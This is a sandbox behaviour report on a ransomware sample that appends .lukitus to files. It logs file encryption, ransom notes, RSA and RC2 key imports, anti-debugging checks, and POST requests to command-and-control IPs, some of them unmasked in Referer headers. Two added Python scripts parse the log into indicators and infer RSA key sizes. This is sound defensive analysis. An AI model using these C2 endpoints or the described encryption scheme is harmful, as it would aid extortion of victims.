VirSCAN

1. You can upload any file, but there is a 20 MB limit per file.
2. VirSCAN supports RAR/ZIP decompression, but the archive must contain fewer than 20 files.
3. VirSCAN can scan password-protected archives if the password is 'infected' or 'virus'.


File information
Safety rating:21
Behavior list
Basic Information
MD5:d7735c779ae63c639d3ccb6d432c5704
file type:EXE
Production company:
version:
Shell or compiler information:PACKER:UPolyX v0.5
Key behavior
Behavior description:Set special folder attributes
details:C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
Behavior description:Suspected ransomware (file-encryption extortion) behavior
details:N/A
Behavior description:Create file on desktop
details:C:\Users\Administrator\Desktop\IT40E96B-3GS1-938B-57D110CA-FD3BA3252509.lukitus
Behavior description:Get TickCount value (GetTickCount sampled around each Sleep call)
details:TickCount = 211953, SleepMilliseconds = 23000.
TickCount = 211968, SleepMilliseconds = 23000.
TickCount = 212062, SleepMilliseconds = 23000.
TickCount = 212093, SleepMilliseconds = 23000.
TickCount = 212109, SleepMilliseconds = 23000.
TickCount = 212125, SleepMilliseconds = 23000.
TickCount = 212140, SleepMilliseconds = 23000.
TickCount = 212156, SleepMilliseconds = 23000.
TickCount = 212171, SleepMilliseconds = 23000.
TickCount = 212187, SleepMilliseconds = 23000.
TickCount = 212312, SleepMilliseconds = 23000.
TickCount = 212343, SleepMilliseconds = 23000.
TickCount = 212359, SleepMilliseconds = 23000.
TickCount = 212375, SleepMilliseconds = 23000.
TickCount = 212390, SleepMilliseconds = 23000.
File behavior
Behavior description:Create file
details:C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-961CD716-851E9434D7C0.lukitus
C:\Python\Python27\Lib\test\lukitus-68f8.htm
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus
C:\Python\Python36\Lib\test\lukitus-e33b.htm
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-0B4FAC60-A0CA8A33C466.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-D71BB6AE-D8F9CEE493AA.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-A08602F4-A350288864B2.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-83A81DBC-F3AD4E96C533.lukitus
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\IT40E96B-3GS1-938B-E92C2EDF-D32FEEC6D8C9.lukitus
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\lukitus-7431.htm
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-69B67E7F-142602E13EB2.lukitus
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-FC626B56-7A6C2DACA1D3.lukitus
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-1E1B0B64-49B4F92876DF.lukitus
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-A3822D79-2C187CF66801.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-1698ADE9-4393DC62ABE7.lukitus
Behavior description:Search for files
details:FileName = C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
FileName = C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\Windows\system32\Ras\*.pbk
FileName = C:\Users\Administrator\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
FileName = C:\Users\Administrator\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
FileName = c:\*
FileName = d:\*
FileName = c:\AnalyzeControl\*
FileName = c:\DiskD\*
FileName = c:\DiskX\*
FileName = c:\monitor\*
FileName = c:\MSOCache\*
FileName = c:\MSOCache\All Users\*
FileName = x:\*
FileName = c:\MSOCache\All Users\{90120000-0011-0000-0000-0000000FF1CE}-C\*
Behavior description:Delete file
details:C:\Python\Python27\Lib\test\DE3D94BA576F97E699A4CBEFECA8C458.tmp
C:\Python\Python36\Lib\test\AE3479040DA3E84D62E5CB176A22AC22.tmp
C:\Python\Python36\Lib\test\7A2FE9E43A0BC01651E979ECA33A7A55.tmp
C:\Python\Python36\Lib\test\21A243005D82172A8EA608708E5A2717.tmp
C:\Python\Python36\Lib\test\196E66512BB03B15E7BE11EB1CE4F29D.tmp
C:\Python\Python36\Lib\test\55D799655E658BF6A98D67A8C5B830B3.tmp
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\0B776691E09DEF180E76819E6BE5ECA0.tmp
C:\Python\Python36\Lib\test\8AF544AE3F2F2762333BBA0B32AEE881.tmp
C:\Python\Python27\Lib\test\AA70BF9198B682C6F870B792F6C9370F.tmp
C:\Python\Python27\Lib\test\1012F134CCACAA8B989E12AEC33E3870.tmp
C:\Python\Python27\Lib\test\6D1B188D1439AF531473C5FA79EA2189.tmp
C:\Python\Python36\Lib\test\A93054DFC9CB838A6D17102AFDC3670E.tmp
C:\Python\Python36\Lib\test\BEF02246FF1FE8D40B0BA0B27AB6F912.tmp
C:\Python\Python36\Lib\test\2B64BC01031A2B9B3E4A9766689D9715.tmp
C:\Python\Python27\Lib\test\6C69DA89D1FF6EBC534E528EF8048D22.tmp
Behavior description:Create file on desktop
details:C:\Users\Administrator\Desktop\IT40E96B-3GS1-938B-57D110CA-FD3BA3252509.lukitus
Behavior description:Rename file
details:C:\Python\Python27\Lib\test\badkey.pem ---> c:\Python\Python27\Lib\test\DE3D94BA576F97E699A4CBEFECA8C458.tmp
C:\Python\Python36\Lib\test\dh1024.pem ---> c:\Python\Python36\Lib\test\AE3479040DA3E84D62E5CB176A22AC22.tmp
C:\Python\Python36\Lib\test\nullbytecert.pem ---> c:\Python\Python36\Lib\test\7A2FE9E43A0BC01651E979ECA33A7A55.tmp
C:\Python\Python36\Lib\test\keycert2.pem ---> c:\Python\Python36\Lib\test\21A243005D82172A8EA608708E5A2717.tmp
C:\Python\Python36\Lib\test\badkey.pem ---> c:\Python\Python36\Lib\test\196E66512BB03B15E7BE11EB1CE4F29D.tmp
C:\Python\Python36\Lib\test\badcert.pem ---> c:\Python\Python36\Lib\test\55D799655E658BF6A98D67A8C5B830B3.tmp
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\cacert.pem ---> c:\Python\Python36\Lib\site-packages\pip\_vendor\requests\0B776691E09DEF180E76819E6BE5ECA0.tmp
C:\Python\Python36\Lib\test\keycert4.pem ---> c:\Python\Python36\Lib\test\8AF544AE3F2F2762333BBA0B32AEE881.tmp
C:\Python\Python27\Lib\test\nokia.pem ---> c:\Python\Python27\Lib\test\AA70BF9198B682C6F870B792F6C9370F.tmp
C:\Python\Python27\Lib\test\nullbytecert.pem ---> c:\Python\Python27\Lib\test\1012F134CCACAA8B989E12AEC33E3870.tmp
C:\Python\Python27\Lib\test\nullcert.pem ---> c:\Python\Python27\Lib\test\6D1B188D1439AF531473C5FA79EA2189.tmp
C:\Python\Python36\Lib\test\allsans.pem ---> c:\Python\Python36\Lib\test\A93054DFC9CB838A6D17102AFDC3670E.tmp
C:\Python\Python36\Lib\test\keycert.pem ---> c:\Python\Python36\Lib\test\BEF02246FF1FE8D40B0BA0B27AB6F912.tmp
C:\Python\Python36\Lib\test\keycert3.pem ---> c:\Python\Python36\Lib\test\2B64BC01031A2B9B3E4A9766689D9715.tmp
C:\Python\Python27\Lib\test\pycacert.pem ---> c:\Python\Python27\Lib\test\6C69DA89D1FF6EBC534E528EF8048D22.tmp
Behavior description:Set special folder attributes
details:C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
Behavior description:Modify file contents
details:C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-961CD716-851E9434D7C0.lukitus ---> Offset = 0
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-961CD716-851E9434D7C0.lukitus ---> Offset = 2202
C:\Python\Python27\Lib\test\badkey.pem ---> Offset = 0
C:\Python\Python27\Lib\test\lukitus-68f8.htm ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus ---> Offset = 307
C:\Python\Python36\Lib\test\dh1024.pem ---> Offset = 0
C:\Python\Python36\Lib\test\lukitus-e33b.htm ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-0B4FAC60-A0CA8A33C466.lukitus ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-0B4FAC60-A0CA8A33C466.lukitus ---> Offset = 5525
C:\Python\Python36\Lib\test\nullbytecert.pem ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-D71BB6AE-D8F9CEE493AA.lukitus ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-D71BB6AE-D8F9CEE493AA.lukitus ---> Offset = 1826
C:\Python\Python36\Lib\test\keycert2.pem ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-A08602F4-A350288864B2.lukitus ---> Offset = 0
Network behavior
Behavior description:Connect to specified site
details:InternetConnectA: ServerName = **.219.29.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.183.165.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.120.110.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
Behavior description:Open HTTP connection
details:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2), hSession = 0x00cc0004
Behavior description:Establish connection to a specified socket
details:IP: **.219.29.**:80, SOCKET = 0x000002a8
IP: **.183.165.**:80, SOCKET = 0x000002a8
IP: **.120.110.**:80, SOCKET = 0x000002a8
Behavior description:Send HTTP packet
details:POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://91.219.29.46/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.219.29.**
Content-Length: 1022
Connection: Keep-Alive

POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://46.183.165.45/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.183.165.**
Content-Length: 1022
Connection: Keep-Alive

POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://146.120.110.46/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.120.110.**
Content-Length: 1022
Connection: Keep-Alive
Behavior description:Open HTTP request
details:HttpOpenRequestA: **.219.29.**:80/imageload.cgi, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: POST, Referer: , Flags = 0x844c0300
HttpOpenRequestA: **.183.165.**:80/imageload.cgi, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: POST, Referer: , Flags = 0x844c0300
HttpOpenRequestA: **.120.110.**:80/imageload.cgi, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: POST, Referer: , Flags = 0x844c0300
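The file and network sections above can be read as one encryption chain per victim file (the original, e.g. badkey.pem, is renamed to a 32-hex-character .tmp, an IT40E96B-3GS1-938B-….lukitus file is created and written, then the .tmp is deleted; the first three groups of the .lukitus name are the same for every file) plus three identical POSTs to /imageload.cgi. The following is an added example, not VirSCAN's code, that parses an excerpt of the report lines into those chains and into network IOCs. One detail worth pulling out: the Referer header carries the full C2 IP that the sandbox masks in the Host header. The excerpt is constructed from the report's own paths and request lines (other headers abridged) using English behaviour labels, and the parsing rules for the "Behavior description:" / "details:" layout are assumptions about this report format.

```python
import re
from collections import Counter

# Constructed excerpt of the report above. Paths and request lines are copied
# from the report (headers abridged); the block layout handling is an assumption.
REPORT = r"""
Behavior description:Create file
details:C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus
C:\Python\Python36\Lib\test\lukitus-e33b.htm
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\IT40E96B-3GS1-938B-E92C2EDF-D32FEEC6D8C9.lukitus
Behavior description:Delete file
details:C:\Python\Python36\Lib\test\AE3479040DA3E84D62E5CB176A22AC22.tmp
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\0B776691E09DEF180E76819E6BE5ECA0.tmp
Behavior description:Rename file
details:C:\Python\Python36\Lib\test\dh1024.pem ---> c:\Python\Python36\Lib\test\AE3479040DA3E84D62E5CB176A22AC22.tmp
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\cacert.pem ---> c:\Python\Python36\Lib\site-packages\pip\_vendor\requests\0B776691E09DEF180E76819E6BE5ECA0.tmp
Behavior description:Send HTTP packet
details:POST /imageload.cgi HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.219.29.46/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Host: **.219.29.** Content-Length: 1022 Connection: Keep-Alive
POST /imageload.cgi HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://46.183.165.45/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Host: **.183.165.** Content-Length: 1022 Connection: Keep-Alive
"""

RENAME_RE = re.compile(r"^(?P<src>.+?) ---> (?P<dst>.+)$")
# <8>-<4>-<4> victim prefix, then a per-file <8 hex>-<12 hex>, then .lukitus
LUKITUS_RE = re.compile(
    r"(?P<prefix>[0-9A-Z]{8}-[0-9A-Z]{4}-[0-9A-Z]{4})-[0-9A-F]{8}-[0-9A-F]{12}\.lukitus$", re.I)
# The sandbox flattens the request onto one line; pull verb, path, Referer host and Host.
HTTP_RE = re.compile(
    r"^(?P<verb>[A-Z]+) (?P<path>\S+) HTTP/1\.[01] .*?Referer: http://(?P<referer>[^/\s]+)/.*?Host: (?P<host>\S+)")


def parse_entries(text):
    """Split report text into (behaviour label, [detail lines]) pairs."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Behavior description:"):
            entries.append((line.split(":", 1)[1].strip(), []))
        elif entries:
            if line.startswith("details:"):
                line = line[len("details:"):].strip()
            entries[-1][1].append(line)
    return entries


def encryption_chains(entries):
    """Join rename -> create -> delete events into one record per victim file.

    Paths are lowercased before matching because the report writes the rename
    target as 'c:\\...' but the later delete as 'C:\\...'."""
    renamed, deleted, created = {}, set(), []
    for label, lines in entries:
        for line in lines:
            if label == "Rename file" and (m := RENAME_RE.match(line)):
                renamed[m["dst"].lower()] = m["src"]
            elif label == "Delete file":
                deleted.add(line.lower())
            elif label == "Create file" and line.lower().endswith(".lukitus"):
                created.append(line)
    chains = [{"original": src, "tmp": tmp, "tmp_deleted": tmp in deleted}
              for tmp, src in renamed.items()]
    prefixes = Counter()  # how many encrypted files share each victim prefix
    for path in created:
        if m := LUKITUS_RE.search(path):
            prefixes[m["prefix"].upper()] += 1
    return chains, prefixes


def network_iocs(entries):
    """Return sorted (verb, path, referer_ip, host) tuples from 'Send HTTP packet' lines."""
    iocs = set()
    for label, lines in entries:
        if label != "Send HTTP packet":
            continue
        for line in lines:
            if m := HTTP_RE.search(line):
                iocs.add((m["verb"], m["path"], m["referer"], m["host"]))
    return sorted(iocs)


if __name__ == "__main__":
    ents = parse_entries(REPORT)
    chains, prefixes = encryption_chains(ents)
    for c in chains:
        print(f"{c['original']} -> {c['tmp']} (tmp deleted: {c['tmp_deleted']})")
    print("victim prefixes:", dict(prefixes))
    for ioc in network_iocs(ents):
        print("C2:", ioc)
```

On the excerpt this yields two chains, both with the .tmp deleted, a single victim prefix IT40E96B-3GS1-938B on every .lukitus file, and two (POST, /imageload.cgi, referer-IP, masked-host) tuples whose referer field is the unmasked C2 address. Feeding it the whole behaviour list instead of the excerpt needs no code change.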
Registry behavior
Behavior description:Modify registry
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\EnableFileTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\EnableConsoleTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\FileTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\ConsoleTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\MaxFileSize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\FileDirectory
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\EnableFileTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\EnableConsoleTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\FileTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\ConsoleTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\MaxFileSize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\FileDirectory
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Behavior description:Delete registry value
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior description:Check whether it is being debugged
details:IsDebuggerPresent
Behavior description:Create mutex
details:RasPbFile
Behavior description:Enumerate network shares
details:N/A
Behavior description:Create event object
details:EventName = Global\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
EventName = Local\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
Behavior description:Suspected ransomware (file-encryption extortion) behavior
details:N/A
Behavior description:Encrypt data
details:[CryptEncrypt] Data: 0x0012F6F4, PlainTextLen: 128, CipherTextLen: 128, Flags: 0x00000000
[CryptEncrypt] Data: 0x015AF6DC, PlainTextLen: 256, CipherTextLen: 256, Flags: 0x00000000
Behavior description:Get TickCount value (GetTickCount sampled around each Sleep call)
details:TickCount = 211953, SleepMilliseconds = 23000.
TickCount = 211968, SleepMilliseconds = 23000.
TickCount = 212062, SleepMilliseconds = 23000.
TickCount = 212093, SleepMilliseconds = 23000.
TickCount = 212109, SleepMilliseconds = 23000.
TickCount = 212125, SleepMilliseconds = 23000.
TickCount = 212140, SleepMilliseconds = 23000.
TickCount = 212156, SleepMilliseconds = 23000.
TickCount = 212171, SleepMilliseconds = 23000.
TickCount = 212187, SleepMilliseconds = 23000.
TickCount = 212312, SleepMilliseconds = 23000.
TickCount = 212343, SleepMilliseconds = 23000.
TickCount = 212359, SleepMilliseconds = 23000.
TickCount = 212375, SleepMilliseconds = 23000.
TickCount = 212390, SleepMilliseconds = 23000.
Behavior description:Open event
details:HookSwitchHookEnabledEvent
\KernelObjects\MaximumCommitCondition
\INSTALLATION_SECURITY_HOLD
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
Global\TermSrvReadyEvent
MSFT.VSA.COM.DISABLE.2724
MSFT.VSA.IEC.STATUS.6c736db0
Behavior description:Call Sleep function
details:[1]: MilliSeconds = 23000.
[2]: MilliSeconds = 60000.
[3]: MilliSeconds = 60000.
[4]: MilliSeconds = 60000.
[5]: MilliSeconds = 60000.
[6]: MilliSeconds = 0.
Behavior description:Open mutex
details:Global\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
Local\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
Local\_!MSFTHISTORY!_
Local\c:!users!administrator!appdata!local!microsoft!windows!temporary internet files!content.ie5!
Local\c:!users!administrator!appdata!roaming!microsoft!windows!cookies!
Local\c:!users!administrator!appdata!local!microsoft!windows!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
Behavior description:Import key
details:[CryptImportKey] Algorithm: CALG_RSA_KEYX (0x0000a400), Data: 0x0012FC24, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RC2 (0x00006602), Data: 0x0012F36C, DataLen: 140, Flags: 0x00000100
[CryptImportKey] Algorithm: CALG_RSA_KEYX (0x0000a400), Data: 0x018D14A8, DataLen: 276, Flags: 0x00000000
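The three CryptImportKey entries record only the algorithm and the blob length (DataLen), not the blob bytes. Because CryptoAPI key blobs have fixed layouts (BLOBHEADER of 8 bytes; RSAPUBKEY of 12 bytes; a SIMPLEBLOB carries a 4-byte ALG_ID and then a session key encrypted to the size of the wrapping RSA modulus), the length alone identifies the blob type and RSA key size. The following is an added example, not VirSCAN's code, that performs that inference for the lengths in this report. It assumes the standard PUBLICKEYBLOB / PRIVATEKEYBLOB / SIMPLEBLOB layouts from wincrypt.h and that the RC2 SIMPLEBLOB was wrapped with RSA; it is an inference from lengths, not a parse of key material.

```python
# CryptoAPI structure sizes fixed by the blob format (wincrypt.h).
BLOBHEADER_LEN = 8    # BYTE bType, BYTE bVersion, WORD reserved, ALG_ID aiKeyAlg
RSAPUBKEY_LEN = 12    # DWORD magic ('RSA1'/'RSA2'), DWORD bitlen, DWORD pubexp
ALG_ID_LEN = 4        # ALG_ID of the key that wraps a SIMPLEBLOB's session key
RSA_MODULUS_BYTES = {64, 128, 192, 256, 384, 512}   # 512- to 4096-bit keys

CALG_RSA_KEYX = 0x0000A400
CALG_RC2 = 0x00006602

# The three CryptImportKey calls from the report above: (algorithm, DataLen).
REPORTED_IMPORTS = [(CALG_RSA_KEYX, 148), (CALG_RC2, 140), (CALG_RSA_KEYX, 276)]


def decode_import(alg_id, data_len):
    """Infer blob type and RSA modulus size from a CryptImportKey (alg, DataLen).

    With n = modulus length in bytes:
      PUBLICKEYBLOB  = BLOBHEADER + RSAPUBKEY + modulus                 = 20 + n
      PRIVATEKEYBLOB = 20 + modulus + 5 CRT values of n/2 + privexp(n)  = 20 + 4.5n
      SIMPLEBLOB     = BLOBHEADER + ALG_ID + RSA-encrypted session key  = 12 + n
    The allowed-size set keeps the two RSA layouts from being confused
    (4.5n never lands on another allowed modulus size)."""
    if alg_id == CALG_RSA_KEYX:
        body = data_len - BLOBHEADER_LEN - RSAPUBKEY_LEN
        if body in RSA_MODULUS_BYTES:
            return {"blob": "PUBLICKEYBLOB", "rsa_bits": body * 8}
        doubled = body * 2                      # 4.5n -> 9n/2, so 2*body = 9n
        if doubled % 9 == 0 and doubled // 9 in RSA_MODULUS_BYTES:
            return {"blob": "PRIVATEKEYBLOB", "rsa_bits": doubled // 9 * 8}
        raise ValueError(f"unrecognised RSA key blob length {data_len}")
    # Symmetric algorithm: assumed to arrive as a SIMPLEBLOB wrapped with RSA.
    wrapped = data_len - BLOBHEADER_LEN - ALG_ID_LEN
    if wrapped not in RSA_MODULUS_BYTES:
        raise ValueError(f"unrecognised SIMPLEBLOB length {data_len}")
    return {"blob": "SIMPLEBLOB", "rsa_bits": wrapped * 8}


def wrapping_key_matches(imports):
    """True if every SIMPLEBLOB's wrapping modulus equals some imported RSA key size."""
    decoded = [decode_import(alg, n) for alg, n in imports]
    rsa_sizes = {d["rsa_bits"] for d in decoded if d["blob"] != "SIMPLEBLOB"}
    return all(d["rsa_bits"] in rsa_sizes for d in decoded if d["blob"] == "SIMPLEBLOB")


if __name__ == "__main__":
    for alg, n in REPORTED_IMPORTS:
        print(hex(alg), n, decode_import(alg, n))
    print("session key wrapped by an imported RSA key:", wrapping_key_matches(REPORTED_IMPORTS))
```

Applied to the report: 148 bytes decodes to a 1024-bit RSA public key, 276 bytes to a 2048-bit RSA public key, and the 140-byte RC2 blob to a session key wrapped by a 1024-bit RSA key, which matches the first import. That is the usual hybrid layout for ransomware key handling, inferred here purely from the sizes the sandbox logged; the RC2 import flag 0x00000100 is not interpreted.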